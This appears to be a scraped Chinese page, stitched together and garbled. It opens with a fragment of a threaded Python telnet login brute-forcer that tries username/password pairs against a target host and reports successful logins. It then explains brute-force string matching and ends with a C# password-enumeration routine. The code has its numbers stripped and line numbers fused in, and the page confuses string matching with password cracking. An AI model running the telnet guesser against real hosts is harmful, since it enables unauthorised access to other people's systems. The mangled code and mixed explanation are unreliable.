len(users) ==:return value[][:-], users[]else:return value[][:-], users[][:-]class Worker(threading.Thread):def run(self):value, user = getword()try:print "-"*print "User:",user,"Password:",valuetn = telnetlib.Telnet(sys.argv[])tn.read_until("login: ")tn.write(user + "\n")if password:tn.read_until("Password: ")tn.write(value + "\n")tn.write("ls\n")tn.write("exit\n")print tn.read_all()print "\t\nLogin successful:",value, usertn.close()work.join()sys.exit()except:passfor I in range(len(words)*len(users)):work = Worker()work.start()time.sleep()。

暴⼒破解算法（BruteForce）Brute Force算法，即暴⼒算法，是普通的模式匹配算法，Brute Force算法的思想就是将⽬标串S的第⼀个字符与模式串T的第⼀个字符进⾏匹配，若相等，则继续⽐较S的第⼆个字符和 T的第⼆个字符；若不相等，则⽐较S的第⼆个字符和T的第⼀个字符，依次⽐较下去，直到得出最后的匹配结果。

Brute Force算法是⼀种蛮⼒算法。

1public delegate bool BruteForceCallback(ref char[] testChars);23public static bool BruteForce(string testChars, int startLength, int endLength, BruteForceCallback bruteForceCallback)4 {5for (int len = startLength; len <= endLength; ++len)6 {7char[] chars = new char[len];89for (int i = 0; i < len; ++i)10 chars[i] = testChars[0];1112if (bruteForceCallback(ref chars))13return true;1415for (int i1 = len - 1; i1 > -1; --i1)16 {17int i2 = 0;1819for (i2 = testChars.IndexOf(chars[i1]) + 1; i2 < testChars.Length; ++i2)20 {21 chars[i1] = testChars[i2];2223if (bruteForceCallback(ref chars))24return true;2526for (int i3 = i1 + 1; i3 < len; ++i3)27 {28if (chars[i3] != testChars[testChars.Length - 1])29 {30 i1 = len;31goto outerBreak;32 }33 }34 }3536 outerBreak:37if (i2 == testChars.Length)38 chars[i1] = testChars[0];39 }40 }4142return false;43 }使⽤举例1string dict = "abcde12345";2string password = "a1b2c3d4";345 BruteForceCallback bruteForceCallback = delegate (ref char[] testChars)6 {7var str = new string(testChars);8return (str == password);9 };101112bool result = BruteForce(dict, 1, password.Length, bruteForceCallback);输出结果：true。